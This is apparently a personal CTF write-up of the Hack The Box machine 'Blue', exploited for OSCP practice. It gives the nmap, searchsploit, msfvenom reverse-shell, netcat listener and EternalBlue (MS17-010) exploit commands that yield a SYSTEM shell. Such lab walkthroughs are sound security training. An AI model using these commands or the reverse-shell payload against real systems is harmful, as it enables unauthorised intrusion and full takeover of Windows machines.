Hack The Box —Blue — without Metasploit (TJNull’s list for OSCP)
This is my 24th write-up for Blue, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.
In a general penetration test or a CTF, there are usually 3 major phases that are involved.
- Enumeration and Scanning (Information Gathering).
- Initial Foothold.
- Privilege Escalation.
Let’s get started with the box!
Enumeration
First, let’s run an nmap scan on default ports to see what services are running on the target system.
nmap -sC -sV -O -oA nmap/initial blue.htb
So we have port 139, and 445 open. And nmap also detects that the OS could possibly be Windows 7 Professional Service Pack 1. First thing that comes to my mind is the well known vulnerability ‘Eternal Blue’ AKA ‘MS17–010’. Well, if you don’t know about this vulnerability no need to worry. Nmap can detect it for you if you run the smb-vuln* scripts against the target.
Initial Foothold
Since, we are not using metasploit module, let’s search for an EternalBlue exploit.
searchsploit ms17-010
We will use this exploit 42315.py. Let’s copy it in our current directory.
searchsploit -m windows/remote/42315.pyLet’s create a reverse shell payload that we will send.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.32 LPORT=4242 -f exe > shell.exeWe need to modify the payload a little. We need to add guest as the username since the target allows guest login on SMB. Further more we need to modify some lines to make the script send our newly generated payload and execute it.
We need to provide the location of our newly generated shell.exe and then execute the command cmd /c c:\shell.exe.
First, start the listener
rlwrap nc -lvnp 4242
Now run the exploit with the IP address of the target or the domain name if you have setup your /etc/hosts file accordingly.
python 42315.py blue.htb
Once the exploit runs…
We get the NT AUTHORITY\SYSTEM (root) shell.
EZ :)
